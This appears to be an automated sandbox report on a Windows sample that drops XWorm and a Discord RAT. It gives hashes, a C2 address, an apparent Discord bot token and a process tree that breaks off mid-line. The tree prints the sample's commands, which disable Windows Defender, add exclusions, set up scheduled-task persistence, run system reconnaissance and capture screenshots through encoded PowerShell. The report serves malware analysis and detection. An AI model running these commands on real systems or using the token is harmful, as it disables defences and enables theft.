Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 17:55

General

  • Target

    RoseBETA2/Rose.exe

  • Size

    7.1MB

  • MD5

    e3a5864bd287c04b45c643e12b4ed47f

  • SHA1

    9ab0757a2cf6f8470d748ab353b3f1bdd4c8f4e5

  • SHA256

    e3a6cc03b47e76ff8b453136726a443c72b6f15ea146559bde34e11fb86fe9c6

  • SHA512

    fb3717826e0fd4c5b1e6cb276c041752a686aa921a702e35431a8511b3a1496c91e723aaf153d696fe62a984c9c780f04aae5bfc6b586b099f586c06ab59ab7b

  • SSDEEP

    196608:3z72FcW+16K2VMf/89/jGCtw9kx6Vro3Kv06u:3As69+/89/jP+kE8l

Malware Config

Extracted

Family

xworm

C2

3.125.209.94:13551

Attributes
  • Install_directory

    %AppData%

  • install_file

    Roaming5.exe

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIzODIyMjM1NTkxNDk0ODYxOA.GIhaBv.jW6xqCJH4cBG7Z95TuFbhmiRz3U2zCK9bD4ZH0

  • server_id

    1237864378947207299

Signatures

  • Detect Xworm Payload 2 IoCs
  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 47 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 12 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RoseBETA2\Rose.exe
    "C:\Users\Admin\AppData\Local\Temp\RoseBETA2\Rose.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAcABqACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4876
    • C:\Windows\XClient - Copy (2).exe
      "C:\Windows\XClient - Copy (2).exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4628
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\XClient - Copy (2).exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5076
        • C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          4⤵
            PID:1760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient - Copy (2).exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:5712
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Roaming5.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:5756
          • C:\Windows\System32\Conhost.exe
            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            4⤵
              PID:764
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Roaming5.exe'
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:5700
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Roaming5" /tr "C:\Users\Admin\AppData\Roaming\Roaming5.exe"
            3⤵
            • Creates scheduled task(s)
            PID:5676
            • C:\Windows\System32\Conhost.exe
              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              4⤵
                PID:5572
          • C:\Users\Admin\AppData\Local\Built.exe
            "C:\Users\Admin\AppData\Local\Built.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:5080
            • C:\Users\Admin\AppData\Local\Built.exe
              "C:\Users\Admin\AppData\Local\Built.exe"
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3592
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Built.exe'"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3656
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Built.exe'
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4260
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3624
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4696
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('DLL-873 Not Found', 0, 'DLL Missing :(', 0+16);close()""
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2872
                • C:\Windows\system32\mshta.exe
                  mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('DLL-873 Not Found', 0, 'DLL Missing :(', 0+16);close()"
                  5⤵
                    PID:2344
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4568
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    5⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2408
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3708
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic csproduct get uuid
                    5⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1760
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3116
                  • C:\Windows\system32\reg.exe
                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                    5⤵
                      PID:2012
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1480
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      5⤵
                        PID:3624
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                        5⤵
                          PID:1852
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:764
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic path win32_VideoController get name
                          5⤵
                          • Detects videocard installed
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1480
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5224
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic path win32_VideoController get name
                          5⤵
                          • Detects videocard installed
                          PID:5284
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5336
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                          5⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5632
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5404
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          5⤵
                          • Enumerates processes with tasklist
                          PID:5564
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5436
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          5⤵
                          • Enumerates processes with tasklist
                          PID:5576
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                        4⤵
                          PID:5664
                          • C:\Windows\System32\Wbem\WMIC.exe
                            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                            5⤵
                              PID:1480
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                            4⤵
                              PID:5696
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-Clipboard
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:768
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                              4⤵
                                PID:5720
                                • C:\Windows\system32\tasklist.exe
                                  tasklist /FO LIST
                                  5⤵
                                  • Enumerates processes with tasklist
                                  PID:2932
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                4⤵
                                  PID:5752
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    5⤵
                                      PID:764
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                    4⤵
                                      PID:5784
                                      • C:\Windows\system32\netsh.exe
                                        netsh wlan show profile
                                        5⤵
                                          PID:5392
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                        4⤵
                                          PID:5812
                                          • C:\Windows\system32\systeminfo.exe
                                            systeminfo
                                            5⤵
                                            • Gathers system information
                                            PID:5464
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                          4⤵
                                            PID:5856
                                            • C:\Windows\system32\reg.exe
                                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                              5⤵
                                                PID:1700
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                              4⤵
                                                PID:5908
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                  5⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5288
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2dkwzq2d\2dkwzq2d.cmdline"
                                                    6⤵
                                                      PID:5800
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC20.tmp" "c:\Users\Admin\AppData\Local\Temp\2dkwzq2d\CSC859823AFF65F437C98FABCC312CB6A1.TMP"
                                                        7⤵
                                                          PID:6028
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    4⤵
                                                      PID:2564
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        5⤵
                                                          PID:6096
                                                      • C:\Windows\system32\cmd.exe
